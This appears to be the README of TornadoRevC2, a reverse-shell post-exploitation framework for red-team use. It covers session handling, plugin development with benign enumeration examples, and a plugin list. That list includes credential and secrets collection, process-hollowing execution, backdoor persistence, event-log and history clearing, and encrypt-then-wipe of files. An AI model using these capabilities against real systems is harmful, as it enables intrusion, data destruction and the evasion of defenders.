TCP/TLS/mTLS पर reverse-shell सत्रों को प्रबंधित करने वाला मॉड्यूलर post-exploitation फ्रेमवर्क, जिसमें enumeration, in-memory execution, SOCKS5 pivoting, और persistence के लिए प्लगइन्स हैं।
अधिकृत सुरक्षा अनुसंधान, रेड-टीम संचालन और पेनेट्रेशन परीक्षण के लिए एक हल्का, मॉड्यूलर पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क। TornadoRevC2 एक एकीकृत ऑपरेटर कंसोल के माध्यम से Linux और Windows होस्ट पर रिवर्स शेल सत्रों का प्रबंधन करता है, होस्ट एन्यूमरेशन, स्थितिजन्य जागरूकता और परिचालन कार्यों के लिए क्रॉस-प्लेटफ़ॉर्म प्लगइन आर्किटेक्चर के साथ कोर सत्र हैंडलिंग का विस्तार करता है।
महत्वपूर्ण: TornadoRevC2 एक सत्र हैंडलर और पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क है—बीकन-शैली का कमांड-एंड-कंट्रोल प्लेटफ़ॉर्म नहीं। यह लगातार एजेंट इन्फ्रास्ट्रक्चर की तुलना में विश्वसनीय इंटरैक्टिव शेल, संरचित ऑपरेटर वर्कफ़्लो और ऑन-डिमांड प्लगइन निष्पादन को प्राथमिकता देता है।
इस सॉफ़्टवेयर का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या उन सिस्टमों पर जहाँ आपके पास स्पष्ट लिखित प्राधिकरण है। लागू कानूनों और संगठनात्मक नीतियों के अनुपालन की जिम्मेदारी पूरी तरह से आपकी है। लेखक और योगदानकर्ता इस परियोजना के उपयोग से उत्पन्न होने वाले दुरुपयोग, डेटा हानि या कानूनी परिणामों के लिए कोई दायित्व स्वीकार नहीं करते हैं।
त्वरित डेमो: सत्र प्रबंधन, प्लगइन निष्पादन, SOCKS5 पिवोटिंग।
TornadoRevC2 एक मॉड्यूलर रिवर्स शेल प्रबंधन फ्रेमवर्क है जो सादे TCP, सर्वर-प्रमाणित TLS, और क्लाइंट-प्रमाणपत्र सत्यापन के साथ म्यूचुअल TLS (mTLS) पर इनबाउंड कनेक्शन स्वीकार करता है, जो सत्र प्रबंधन, होस्ट टोही, चंक्ड फ़ाइल स्थानांतरण, इन-मेमोरी पेलोड निष्पादन, SOCKS5 पिवोटिंग, प्लगइन-संचालित पोस्ट-एक्सप्लॉइटेशन, संरचित रिपोर्टिंग, और स्वचालित Git-आधारित अपडेट और निर्बाध हैंडलर पुनःआरंभ के लिए एक अंतर्निहित update कमांड के लिए एक एकीकृत ऑपरेटर कंसोल प्रदान करता है। मूल रूप से एक हल्के रिवर्स शेल हैंडलर के रूप में विकसित, यह परियोजना एक विस्तारणीय फ्रेमवर्क में विकसित हुई है जिसमें फ़ायरवॉल एन्यूमरेशन, क्रेडेंशियल स्टोर मेटाडेटा संग्रह, नेटवर्क मैपिंग, ब्राउज़र प्रोफाइलिंग, और अतिरिक्त पोस्ट-एक्सप्लॉइटेशन कार्यक्षमता जैसी क्षमताएँ स्वतंत्र, मॉड्यूलर प्लगइन के रूप में कार्यान्वित की गई हैं। फ्रेमवर्क में ऑपरेटर पक्ष से कमांड-लाइन टूल्स का उपयोग करके रिमोट प्रोटोकॉल (SSH, WinRM, SMB, RDP, WMI, MSSQL) के माध्यम से नए C2 सत्र स्थापित करने के लिए make_token प्लगइन भी शामिल है, जिसमें कस्टम पोर्ट, NTLM हैश प्रमाणीकरण, और netexec एकीकरण का समर्थन है, और एक upgrade_mtls प्लगइन जो हैंडलर के क्लाइंट प्रमाणपत्र बंडल को लक्ष्य पर पुश करके एक लाइव सत्र को म्यूचुअल-TLS लिसनर पर स्थानांतरित करता है।
समर्थित लक्ष्य प्लेटफ़ॉर्म: Linux और Windows (प्राथमिक), जहाँ लागू हो वहाँ सामान्य Unix और BSD वातावरणों के लिए संगतता के साथ।
| श्रेणी | क्षमताएँ |
|---|---|
| सत्र हैंडलिंग | स्वचालित PKI बूटस्ट्रैपिंग के साथ मल्टी-क्लाइंट TCP / TLS / mTLS लिसनर · लाइव सत्रों के लिए ऑन-डिमांड mTLS अपग्रेड · इंटरैक्टिव PTY/TTY शेल · सत्र फ़िंगरप्रिंटिंग और पुनःकनेक्ट ट्रैकिंग |
| फ़ाइल स्थानांतरण | चंक्ड अपलोड और डाउनलोड · SHA-256 अखंडता सत्यापन |
| पेलोड निष्पादन | py, ps, exe, elf, bat, और sh के लिए इन-मेमोरी निष्पादन |
| पिवोटिंग और टनलिंग | स्वचालित रिमोट क्लीनअप के साथ समझौता किए गए सत्रों के माध्यम से SOCKS5 प्रॉक्सी · बैकग्राउंड स्थायित्व के साथ Ligolo-NG और Chisel एजेंट तैनाती |
| रिमोट सत्र स्थापना | make_token — ऑपरेटर पक्ष से SSH, WinRM, SMB, RDP, WMI, और MSSQL पर नए सत्र स्थापित करें, NTLM हैश प्रमाणीकरण और netexec एकीकरण के साथ |
| प्रतिरूपण | runas — किसी अन्य उपयोगकर्ता के रूप में कमांड निष्पादित करें या TLS-एन्क्रिप्टेड शेल स्पॉन करें, स्थानीय या रिमोट, डोमेन समर्थन और netexec एकीकरण के साथ |
| एन्यूमरेशन | होस्ट ट्राइएज, नेटवर्क स्थिति, क्रेडेंशियल और ब्राउज़र मेटाडेटा, Kerberos टिकट, Linux आंतरिक, और Windows डोमेन और सिस्टम कॉन्फ़िगरेशन को कवर करना |
| परिचालन प्लगइन | मल्टी-पास सुरक्षित फ़ाइल वाइपिंग · हाइब्रिड फ़ाइल एन्क्रिप्शन · शेल इतिहास सफ़ाई · Windows इवेंट लॉग सफ़ाई |
| स्थायित्व | TLS-एन्क्रिप्टेड पेलोड का उपयोग करके क्रॉस-प्लेटफ़ॉर्म बैकडोर स्थापना — Linux/Unix पर cron @reboot, Windows पर Run रजिस्ट्री |
| विस्तारणीयता | रनटाइम प्लगइन लोड, रीलोड, और अनलोड · TORNADOREVC2_PLUGIN_DIR के माध्यम से बाहरी प्लगइन · प्रलेखित SessionContext API |
| रिपोर्टिंग | प्रति-सत्र लॉगिंग · संरचित प्लगइन आउटपुट · HTML ट्रांसक्रिप्ट निर्यात |
| स्व-अपडेट | रिपॉज़िटरी सत्यापन, फ़ास्ट-फ़ॉरवर्ड पुल, और स्वचालित हैंडलर पुनःआरंभ के साथ Git-आधारित update कमांड · फ़ोर्क-अनुकूल, विचलन पहचान और सुरक्षित रीसेट प्रॉम्प्ट के साथ |
समर्थित नहीं: कार्य शेड्यूलिंग, या बीकन-शैली कॉलबैक इन्फ्रास्ट्रक्चर।
TornadoRevC2 उन वातावरणों के लिए इंजीनियर किया गया है जहाँ तैनाती घर्षण और परिचालन पदचिह्न मायने रखते हैं।
प्लगइन लक्ष्य होस्ट पर पहले से मौजूद नेटिव Windows और Linux उपयोगिताओं और अंतर्निहित सिस्टम कमांड का लाभ उठाते हैं—netsh, ss, iptables, ufw, firewall-cmd, nft, PowerShell cmdlets, nmcli, wevtutil, और अन्य। कलेक्टर रिवर्स शेल चैनल के माध्यम से इन टूल्स को आमंत्रित करते हैं और आउटपुट को रिमोट रूप से पार्स करते हैं, जिससे अतिरिक्त बाइनरी अपलोड करने या निर्भरताएँ स्थापित करने की आवश्यकता कम हो जाती है।
प्लगइन संचालन मौजूदा रिवर्स शेल चैनल के माध्यम से निष्पादित होते हैं और लक्ष्य सिस्टम पर बाइनरी, निष्पादन योग्य, स्क्रिप्ट, या अस्थायी फ़ाइलें ड्रॉप करने की आवश्यकता नहीं होती। एन्यूमरेशन कार्य नेटिव कमांड या इन-प्रोसेस कलेक्टर स्क्रिप्ट के रूप में चलते हैं; परिणाम शेल पर चिह्नित JSON के रूप में लौटते हैं। एकमात्र अपरिहार्य आर्टिफ़ैक्ट शेल द्वारा स्वयं उत्पन्न सामान्य कमांड इतिहास है।
जब कोई एन्यूमरेशन रूटीन विफल होता है, अनुपलब्ध होता है, या टाइमआउट हो जाता है, तो प्लगइन पूरी तरह से निरस्त नहीं होता। प्रभावित अनुभाग खाली छोड़ दिया जाता है या N/A के रूप में चिह्नित किया जाता है जबकि रिपोर्ट का शेष भाग जारी रहता है।
हैंडलर अपडेट ऑपरेटर मशीन पर Git के माध्यम से वितरित किए जाते हैं। update कमांड सीमित सबप्रोसेस टाइमआउट, गैर-इंटरैक्टिव Git सेटिंग्स, और एक तेज़ स्थानीय शटडाउन पथ का उपयोग करता है ताकि हैंडलर रिमोट सत्र क्लीनअप पर अवरुद्ध हुए बिना विश्वसनीय रूप से पुनःआरंभ हो सके।
┌─────────────────────────────────────────────────────────────────┐ │ Operator Console (handler) │ │ Sessions · Transfers · SOCKS · Plugins · Logging · Export · │ │ update │ └────────────────────────────┬────────────────────────────────────┘ │ reverse shell channel (TCP / TLS / mTLS) ▼ ┌─────────────────────────────────────────────────────────────────┐ │ Target Host │ │ Native commands · PowerShell · inline collectors │ │ T_PLUGIN_START + JSON + T_PLUGIN_END │ └─────────────────────────────────────────────────────────────────┘
### लिसनर कॉन्फ़िगरेशन
TornadoRevC2 **एक साथ तीन स्वतंत्र लिसनर** चलाता है, ताकि इम्प्लांट engagement के थ्रेट मॉडल के आधार पर plaintext, server-authenticated TLS, या mutually authenticated TLS के ज़रिए कनेक्ट कर सकें:
| लिसनर | डिफ़ॉल्ट पोर्ट | फ़्लैग | प्रमाणीकरण | प्रमाणपत्र |
|----------|--------------|------|----------------|--------------|
| TCP | `4444` | `-p` | कोई नहीं | कोई नहीं |
| TLS | `8443` | `-tp` | Server-authenticated | `tls_certs/server.pem`, `tls_certs/server.key` |
| mTLS | `9443` | `-mp` | Mutual (client cert आवश्यक) | `mtls_certs/` बंडल (CA + server + client) |
`-H` फ़्लैग तीनों लिसनरों द्वारा साझा किया जाने वाला bind address सेट करता है। तीनों को एक साथ सक्षम किया जा सकता है; किसी एक को अक्षम करना वर्तमान में आवश्यक नहीं है — इसे अनदेखा करने के लिए पोर्ट को खाली या unbound छोड़ दें।
**स्वचालित प्रमाणपत्र जनरेशन।** पहले लॉन्च पर हैंडलर दो अलग-अलग डायरेक्टरी बनाता है और अपनी आवश्यक सामग्री को बूटस्ट्रैप करता है:```text
tls_certs/
server.pem # self-signed server certificate
server.key # server private key
mtls_certs/
ca.pem # mTLS certificate authority (self-signed, 4096-bit RSA)
ca.key # CA private key
ca.srl # OpenSSL serial counter (auto-generated)
server-mtls.pem # server cert signed by CA
server-mtls.key # server private key
client.pem # client cert signed by CA — ship to implant
client.key # client private key — ship to implant
tornadorevc2/plugins/ shared/ Cross-platform plugins with internal Windows/Linux implementations linux/ Linux/Unix-only plugins and collector builders windows/ Windows-only plugins (rdp, services, eventlogdel, …) api.py SessionContext and @plugin.command registration manager.py Runtime loading, execution, and platform filtering loader.py Automatic module discovery
**साझा प्लगइन्स** (`firewall`, `ports`, `browser`, `credstore`, और अन्य) `shared/` में एकल एकीकृत मॉड्यूल के रूप में मौजूद हैं। **प्लेटफ़ॉर्म-विशिष्ट प्लगइन्स** जैसे `rdp` और `eventlogdel` विशेष रूप से `windows/` या `linux/` के अंतर्गत रहते हैं और `shared/` में दोहराए नहीं जाते हैं।
कलेक्टर्स मार्कर टोकन (`__T_PLUGIN_START__` / `__T_PLUGIN_END__`) में लिपटे JSON उत्सर्जित करते हैं। साझा रनर इस आउटपुट को पार्स करता है, ऑपरेटर-उन्मुख रिपोर्ट प्रारूपित करता है, और परिणामों को सत्र लॉग निर्देशिका के अंतर्गत संग्रहीत करता है।
---
## आवश्यकताएँ और स्थापना
**हैंडलर (ऑपरेटर मशीन):**
- Python 3.7 या बाद का संस्करण
- OpenSSL (स्वचालित TLS और mTLS प्रमाणपत्र निर्माण के लिए)
- Git (वैकल्पिक; `update` ऑपरेटर कमांड के लिए आवश्यक)
- किसी तृतीय-पक्ष Python पैकेज की आवश्यकता नहीं है```bash
git clone https://github.com/kamalx06/TornadoRevC2.git
cd TornadoRevC2
python3 tornadorevc2.py
python tornadorevc2.py
python tornadorevc2.py -H 0.0.0.0 -p 4444 -tp 8443 -mp 9443
python tornadorevc2.py
-c tls_certs/server.pem -k tls_certs/server.key
--mtls-ca-cert mtls_certs/ca.pem --mtls-ca-key mtls_certs/ca.key
--mtls-server-cert mtls_certs/server-mtls.pem --mtls-server-key mtls_certs/server-mtls.key
--mtls-client-cert mtls_certs/client.pem --mtls-client-key mtls_certs/client.key
### 2. एक सत्र स्थापित करें
अंतर्निहित कैटलॉग (`payloads`) से एक रिवर्स शेल तैनात करें या अपना खुद का इम्प्लांट उपयोग करें। कनेक्ट होने पर, TornadoRevC2 एक सत्र ID असाइन करता है और `logs/` के अंतर्गत लॉगिंग शुरू करता है।
### 3. संचालन करें```bash
status # List active sessions
switch 1 # Attach to session 1
sysinfo 1 # Collect host metadata
run credstore 1 # Credential store metadata
run memorymap 1 1234 # Process memory maps (requires PID)
run inmemory 1 sh ./linpeas.sh # In-memory script execution
update # Pull latest from GitHub and restart (Git installs)
switch <ID> के माध्यम से attach करने पर, बाद के commands में session ID छोड़ दें (run quickenum 1 के बजाय run quickenum)। किसी client session के अंदर plugin listings और TAB completion उस session के platform के साथ compatible plugins तक filtered रहते हैं।
update command केवल main handler prompt से उपलब्ध है। यह सत्यापित करता है कि Git installed है, पुष्टि करता है कि installation एक Git working tree है, configured remote से fetch करता है, updates मौजूद होने पर fast-forward pull करता है, और handler को उसी executable और arguments के साथ restart करता है। यदि installation पहले से ही current है, तो यह TornadoRevC2 is already running the latest version. print करता है और server को चलता रहने देता है।
| Command | Description |
|---|---|
status / ls | List active reverse shell sessions |
sessions | Show tracked sessions, including disconnected hosts |
reconnects | Display session reconnect history |
switch <ID> | Attach to an interactive session shell |
kill <ID> | Terminate a session |
rename <ID> <name> / rn <ID> <name> | Assign a friendly name |
sysinfo <ID> [--stealth|--full] | Collect or refresh host information |
export <ID> | Export an HTML session transcript |
| Command | Description |
|---|---|
plugins / plugins list | List registered plugins |
plugins list --verbose | Show module paths and load state |
plugins load <name> | Load an external plugin at runtime |
plugins unload <name> | Disable or unload a plugin |
plugins reload <name> | Reload a plugin module |
plugins info <name> | Display plugin metadata |
run <plugin> <ID> [args...] | Execute a plugin against a session |
| Command | Description |
|---|---|
upload [--resume] <ID> <local> <remote> | Upload with chunked transfer |
download [--resume] <ID> <remote> <local> | Download with chunked transfer |
verify <ID> <remote> / hash <ID> <remote> | Verify remote file size and SHA-256 |
| Command | Description |
|---|---|
run inmemory <ID> <type> <local_file> [-- args] [--save-output <file>] | Execute payload in memory |
Supported types: py, ps, exe, elf, bat, sh
| Command | In-session form | Description |
|---|---|---|
socks <ID> <listen_port> | socks <listen_port> | Start a SOCKS5 proxy through a session (local listener on 127.0.0.1:<listen_port>) |
socks <ID> test <host> <port> | socks test <host> <port> | Test TCP reachability to an internal host through the tunnel agent |
socks <ID> reset | socks reset | Reset tunnel agent streams and discard buffered data (does not stop active SOCKS listeners) |
socks stop <proxy_id> | socks stop <proxy_id> | Stop a SOCKS proxy and clean up remote tunnel artifacts when no other proxy uses the session |
tunnels | tunnels | List active SOCKS proxies, channel count, and status |
| Command | Description |
|---|---|
payloads | Display the built-in payload reference |
update | Check for updates from the official GitHub repository and restart after a successful fast-forward pull (requires Git; main menu only) |
help | Show the command reference |
exit / quit | Shut down the handler |
TornadoRevC2 51 built-in plugins के साथ आता है जो function के अनुसार व्यवस्थित हैं। सभी enumeration संबंधित plugins read-only हैं जब तक अन्यथा नोट न किया गया हो।
| Plugin | Platform | Description |
|---|---|---|
quickenum | Cross-platform | Fast structured host triage: identity, network, environment, prioritized findings |
virtualization | Cross-platform | Virtualization, container, orchestration, and cloud environment detection |
kernel | Cross-platform | Kernel version, loaded modules/drivers, security mitigations, and kernel configuration |
integrity | Cross-platform | Secure Boot, BitLocker/LUKS, code-signing enforcement, kernel lockdown, and integrity protections |
filesearch | Cross-platform | Search files by path, name, ext, size, owner, mtime (run filesearch help for options) |
packages | Cross-platform | Installed software, package managers, repository configuration, and recent installs |
sysinfo | Cross-platform | Host metadata collection (handler command, not a plugin) |
kerberosenum | Cross-platform | Kerberos ticket metadata: caches, default principal, realm, TGT, service tickets, encryption types, flags (renewable/forwardable), keytab files, krb5.conf/registry config, and environment variables (no secrets) |
| Plugin | Platform | Description |
|---|---|---|
firewall | Cross-platform | Firewall status, profiles/zones, policies, and notable rules (WDF, UFW, firewalld, nftables, iptables) |
ports | Cross-platform | Listening ports, established connections, owning processes, and routing |
proxy | Cross-platform | System, environment, PAC/WPAD, and browser proxy settings |
vpn | Cross-platform | VPN clients, active connections, adapters, and configuration metadata |
| Plugin | Platform | Description |
|---|---|---|
credstore | Cross-platform | Credential store metadata (no secret extraction): Credential Manager, keyrings, browser stores |
browser | Cross-platform | Installed browsers, profiles, extensions, bookmarks, and enterprise policies |
clipboard | Cross-platform | Remote clipboard text capture |
secrets | Linux/Unix | Configuration files, environment variables, SSH keys, and cloud credentials |
| Plugin | Platform | Description |
|---|---|---|
history | Cross-platform | Shell history, package/update logs, and recent login activity |
mounts | Cross-platform | Mount points, SMB/NFS shares, mapped drives, container filesystems |
memorymap | Cross-platform | Process memory maps and loaded modules for a specified PID |
screenshot | Cross-platform | Desktop capture returned to the operator (GUI sessions; PNG saved locally) |
cron | Linux/Unix | Cron jobs, system crontabs, user crontabs, and at queues |
systemd | Linux/Unix | Services, timers, failed units, and enabled startup units |
privbins | Linux/Unix | SUID/SGID binaries, file capabilities, and privilege-escalation-relevant executables |
lsm | Linux/Unix | SELinux, AppArmor, and other Linux Security Modules: enforcement mode, policies, and configuration |
journal | Linux/Unix | Structured journalctl summaries: authentication, kernel, service failures, and recent events |
sshaudit | Linux/Unix | SSH server enumeration: effective sshd config, auth surface, pivoting options, host keys, authorized_keys, and CA trust |
containers | Linux/Unix | Container runtimes and workloads: Docker, Podman, containerd, CRI-O, LXC/LXD, and Kubernetes indicators |
usersessions | Cross-platform | Active local, remote, SSH, RDP, console, and service sessions with login/source metadata |
| Plugin | Platform | Description |
|---|---|---|
adinfo | Windows | Domain membership, domain controllers, forests, trusts, and OUs |
services | Windows | Windows services, startup types, binaries, and service accounts |
scheduledtasks | Windows | Scheduled tasks, triggers, execution context, and actions |
registry | Windows | Autorun keys, startup locations, and installed software |
eventlogs | Windows | Security, System, Application, and PowerShell log summaries |
defender | Windows | Microsoft Defender status, exclusions, ASR rules, and third-party AV |
certificates | Windows | Certificate stores, code-signing, and enterprise certificates |
rdp | Windows | Remote Desktop configuration, status, recent targets, and settings |
gpo | Windows | Applied GPOs, local/domain security policies, AppLocker, WDAC, SRP, and GPO scripts |
winrm | Windows | WinRM configuration, listeners, authentication methods, firewall integration, and remoting status |
drivers | Windows | Installed drivers and kernel modules, signed/unsigned status, startup type, and notable security/VM drivers |
powershell | Windows | PowerShell version, execution policy, logging, modules, remoting settings, and profile paths |
lsa | Windows | LSA protection, Credential Guard, virtualization-based security, and credential security configuration |
| Plugin | Platform | Description |
|---|---|---|
inmemory | Cross-platform | In-memory payload execution (py, ps, exe, elf, bat, sh) |
make_token | Cross-platform | Establish C2 sessions via remote protocols (SSH, WinRM, SMB, RDP, WMI, MSSQL) using CLI tools from operator side with support for custom ports, NTLM hashes, and netexec integration |
nullcrypt | Cross-platform | Hybrid encrypt a file (AES-GCM + RSA-wrapped key) then securely wipe the original via wiper |
wiper | Cross-platform | Configurable multi-pass secure overwrite (rename, truncate, delete); profiles: quick, standard, dod, thorough, shred |
historydel | Cross-platform | Clear current user shell history files and related storage |
eventlogdel | Windows | Clear Windows Event Logs via native wevtutil / Clear-EventLog |
runas | Windows | Execute commands or spawn a TLS‑encrypted reverse shell as another user (local/remote) with credential management, domain support, and netexec integration |
ligolong | Cross‑platform | Deploy Ligolo‑NG tunneling agent to Linux/Windows targets with background persistence |
chisel | Cross‑platform | Deploy Chisel tunneling agent in reverse (client) or bind (server) mode; supports SOCKS5 and background persistence |
persistence | Cross‑platform | Install a persistent reverse shell backdoor (cron @reboot / Run registry) using TLS‑encrypted payload |
upgrade_mtls | Cross‑platform | Push the handler's mTLS client bundle to a session and relaunch it over the mTLS listener (opt-in; does not affect other listeners) |
In-memory execution methods:
| Type | Method |
|---|---|
py | Python via exec(compile(...)) |
ps | PowerShell via Invoke-Expression |
exe | Windows PE via in-memory RunPE (process hollowing) |
elf | Linux ELF via memfd_create with /dev/shm fallback |
sh | Shell script streamed via bash -s |
bat | Batch script streamed via cmd.exe /Q stdin |
PEASS-ng scripts for in-memory privesccheck: github.com/carlospolop/PEASS-ng
यह section बताता है कि TornadoRevC2 को custom plugins के साथ कैसे extend करें। Plugins साधारण Python modules हैं जो @plugin.command के साथ commands register करते हैं और target session के लिए एक SessionContext प्राप्त करते हैं। Core handler code में किसी बदलाव की आवश्यकता नहीं है।
Plugin system में चार layers हैं:
| Layer | Module | Responsibility |
|---|---|---|
| Registration | plugins/api.py | @plugin.command decorator, global command registry, SessionContext |
| Discovery | plugins/loader.py | Scans shared/, linux/, windows/, and external directories; imports modules |
| Execution | plugins/manager.py | Resolves platform, builds context, invokes handler, handles errors |
| Collectors | plugins/shared/runner.py | Marker parsing, JSON extraction, report formatting, logging |
Import time पर, @plugin.command decorator प्रत्येक handler को एक thread-safe global registry में register करता है। Runtime पर, PluginManager.run_plugin() platform compatibility validate करता है, एक SessionContext construct करता है, और handler को (session, args) के साथ call करता है।
Handlers एक integer exit code return करते हैं: success के लिए 0, failure के लिए non-zero। Handler console non-zero returns के लिए warnings display करता है।
Platform scope और यह कि plugin project के साथ ship होता है या नहीं, के आधार पर एक location चुनें:
| Location | Scope | Loaded |
|---|---|---|
tornadorevc2/plugins/shared/ | Cross-platform (internal Windows + Linux implementations) | Automatically at startup |
tornadorevc2/plugins/linux/ | Linux/Unix only | Automatically at startup |
tornadorevc2/plugins/windows/ | Windows only | Automatically at startup |
./plugins/myplugin.py | External (any scope you define) | On demand via plugins load |
./plugins/myplugin/__init__.py | External package | On demand via plugins load |
Path in TORNADOREVC2_PLUGIN_DIR | External (custom directory) | On demand via plugins load |
Layout rules:
shared/ के अंतर्गत common.py, runner.py, और __init__.py नाम की files discovery के दौरान skip की जाती हैं।linux/ या windows/ के अंतर्गत _ से शुरू होने वाली files helper modules हैं, plugins नहीं।shared/ में एक single module होना चाहिए जिसमें internal platform branching हो—cross-platform plugins को shared/ और linux//windows/ दोनों में duplicate न करें।rdp, eventlogdel) विशेष रूप से windows/ या linux/ में होने चाहिए।@plugin.command decorator के साथ एक command register करें:```python
from tornadorevc2.plugins import plugin, SessionContext
@plugin.command(
name="myplugin", # Command name used with run myplugin <ID>
platforms=["linux", "windows", "unix"], # Supported session platforms
description="Short description for plugins list and TAB completion",
)
def run(session: SessionContext, args):
...
return 0 # 0 = success, non-zero = failure
**प्लेटफ़ॉर्म मान:** `linux`, `windows`, `unix`। Linux और `unix` को संगत माना जाता है— `linux` के लिए पंजीकृत प्लगइन दोनों पर चलता है। यदि छोड़ा जाए तो डिफ़ॉल्ट: `["linux", "windows", "unix"]`।
**प्रति मॉड्यूल कई कमांड:** एक ही फ़ाइल कई फ़ंक्शन्स पर `@plugin.command` लागू करके कई कमांड पंजीकृत कर सकती है। प्रत्येक को एक स्वतंत्र नाम मिलता है।
### निष्पादन जीवनचक्र
जब कोई ऑपरेटर `run myplugin 1 arg1 arg2` चलाता है:```text
1. PluginManager resolves session #1 and looks up "myplugin" in the registry
2. Platform check: plugin.platforms vs session shell type (unix/windows)
3. SessionContext(handler, client_socket) is constructed
4. Handler invoked: run(ctx, ["arg1", "arg2"])
5. Handler executes remote work via run_shell / run_marked / run_collector_plugin
6. Output printed to operator console; results logged under logs/<session>/plugins/
7. Exit code returned (0 = success)
एक संलग्न सत्र के अंदर (switch <ID>), सत्र ID छोड़ दी जाती है और args प्लगइन नाम के तुरंत बाद शुरू होते हैं: run myplugin arg1 arg2।
इसका उपयोग तब करें जब आपको संरचित JSON पार्सिंग के बिना एक त्वरित एक-बार वाला कमांड चाहिए। हैंडलर एक नेटिव शेल कमांड चलाता है, आउटपुट प्रिंट करता है, और परिणाम लॉग करता है।```python from tornadorevc2.plugins import plugin, SessionContext
@plugin.command( name="whoami", platforms=["linux", "windows", "unix"], description="Print remote user identity", ) def run(session: SessionContext, args): session.log_event("Plugin whoami: started")
if session.is_windows:
cmd = "whoami /all"
else:
cmd = "id 2>/dev/null || whoami"
output = session.run_shell(cmd, timeout=10.0)
if not output.strip():
session.print("Plugin 'whoami' failed — no output from target.", "red")
session.log_plugin_result("whoami", "", "no output")
return 1
report = output.strip()
session.print(report, "cyan")
session.log_plugin_result("whoami", report)
session.log_command("run whoami", report)
return 0
**कब उपयोग करें:** सरल प्रोब, एक-पंक्ति गणना, ऐसे कमांड जिन्हें संरचित रिपोर्ट की आवश्यकता नहीं होती।
**मुख्य विधियाँ:** `session.run_shell(cmd, timeout)`, `session.print(text, color)`, `session.log_plugin_result(name, report, detail='')`.
### पैटर्न 2: संरचित कलेक्टर (अनुशंसित)
उन गणना प्लगइन्स के लिए उपयोग करें जो लक्ष्य पर संरचित डेटा एकत्र करते हैं और एक स्वरूपित रिपोर्ट लौटाते हैं। यह वही पैटर्न है जिसका उपयोग सभी अंतर्निहित रेकॉनिसेंस प्लगइन्स (`firewall`, `ports`, `browser`, आदि) करते हैं।
**प्रवाह:**```text
Handler Target host
│ │
├─ session.log_event("started") │
├─ flush shell buffer │
├─ resolve platform (unix/windows) │
├─ build collector command/script ─────►│ Linux: inline Python or native shell
│ │ Windows: PowerShell script in-process
│ ├─ invoke native OS commands
│ ├─ assemble result dict
│ └─ emit __T_PLUGIN_START__ + JSON + __T_PLUGIN_END__
│◄──────────────────────────────────────┤
├─ parse_collector_json(raw) │
├─ formatter(data) → report string │
├─ session.print(report) │
└─ session.log_plugin_result(...) │
न्यूनतम क्रॉस-प्लेटफ़ॉर्म उदाहरण:```python from tornadorevc2.plugins import plugin, SessionContext from tornadorevc2.plugins.linux._helpers import build_linux_collector_command from tornadorevc2.plugins.shared.common import format_generic_report from tornadorevc2.plugins.shared.runner import run_collector_plugin from tornadorevc2.constants import PLUGIN_MARK_END, PLUGIN_MARK_START
def _linux_collector_source(): # Runs inside a try/except wrapper on the target. # Call _emit(result) with a JSON-serializable dict — do NOT print markers yourself. return r''' import subprocess result = {'summary': {}, 'processes': []} try: out = subprocess.check_output(['ps', 'auxww'], stderr=subprocess.STDOUT, timeout=10) lines = out.decode('utf-8', errors='replace').splitlines() result['summary'] = {'count': max(0, len(lines) - 1)} result['processes'] = lines[1:51] except Exception as exc: result['summary'] = {'error': str(exc)} _emit(result) '''
def _build_linux_command(): return build_linux_collector_command(_linux_collector_source())
def _build_windows_command(): return rf""" $ErrorActionPreference='SilentlyContinue' $start='{PLUGIN_MARK_START}'; $end='{PLUGIN_MARK_END}' $procs = Get-CimInstance Win32_Process -EA 0 | Select-Object -First 50 ProcessId, Name, CommandLine $result = [ordered]@{{ summary = @{{ count = @($procs).Count }} processes = @($procs) }} Write-Output ($start + (ConvertTo-Json $result -Depth 4 -Compress) + $end) """
@plugin.command( name="processes", platforms=["linux", "windows", "unix"], description="List running processes on the remote host", ) def run(session: SessionContext, args): return run_collector_plugin( session, "processes", _build_linux_command, # callable — built at execution time _build_windows_command, # callable — built at execution time format_generic_report, # turns parsed dict into operator-facing text timeout=25.0, # seconds to wait for marked output )
**`run_collector_plugin` पैरामीटर:**
| पैरामीटर | प्रकार | विवरण |
|-----------|------|-------------|
| `session` | `SessionContext` | लक्ष्य सत्र |
| `plugin_name` | `str` | लॉग और त्रुटि संदेशों में उपयोग किया जाने वाला नाम |
| `unix_builder` | `Callable[[], str]` या `None` | Unix/Linux शेल कमांड लौटाता है; यदि उपलब्ध न हो तो `None` |
| `win_builder` | `Callable[[], str]` या `None` | PowerShell स्क्रिप्ट लौटाता है; यदि उपलब्ध न हो तो `None` |
| `formatter` | `Callable[[dict], str]` | पार्स किए गए JSON dict को रिपोर्ट स्ट्रिंग में परिवर्तित करता है |
| `timeout` | `float` | चिह्नित आउटपुट की प्रतीक्षा करने के लिए अधिकतम सेकंड (डिफ़ॉल्ट 30) |
उस OS पर प्लगइन को अनुपलब्ध चिह्नित करने के लिए प्लेटफ़ॉर्म बिल्डर के लिए `None` पास करें (देखें [Platform-specific plugins](#platform-specific-plugins))।
बाहरी प्लगइन सहेजने के बाद:```bash
plugins load processes
plugins info processes
run processes 1
जब आपको आर्ग्युमेंट वैलिडेशन, डायनामिक कलेक्टर निर्माण, पोस्ट-कलेक्टर प्रोसेसिंग, या ऑपरेटर-साइड फ़ाइल हैंडलिंग की आवश्यकता हो जो अकेले run_collector_plugin कवर नहीं करता, तब इसका उपयोग करें।
कोडबेस में उदाहरण:
| प्लगइन | कस्टम व्यवहार |
|---|---|
memorymap | PID आर्ग्युमेंट की आवश्यकता है; एम्बेडेड PID के साथ कलेक्टर को डायनामिक रूप से बनाता है |
wiper | रिमोट पाथ की आवश्यकता है; पुष्टि आउटपुट के साथ विनाशकारी क्रिया |
screenshot | base64 इमेज को डिकोड करता है और ऑपरेटर मशीन पर स्थानीय रूप से PNG सेव करता है |
historydel | कलेक्टर चलाता है, फिर इन-मेमोरी हिस्ट्री क्लीनअप के लिए फॉलो-अप शेल कमांड भेजता है |
clipboard | हार्ड error के बजाय reason फ़ील्ड के माध्यम से कस्टम सॉफ्ट-फेल्योर हैंडलिंग |
आर्ग्युमेंट वैलिडेशन उदाहरण (memorymap से):```python
import re
from tornadorevc2.plugins import plugin, SessionContext
from tornadorevc2.plugins.shared.runner import _run_collector_marked, parse_collector_json
@plugin.command( name="memorymap", platforms=["linux", "windows", "unix"], description="Enumerate memory maps for a process (requires PID)", ) def run(session: SessionContext, args): if not args or not re.match(r"^\d+$", args[0].strip()): session.print("Usage: run memorymap ", "yellow") return 1
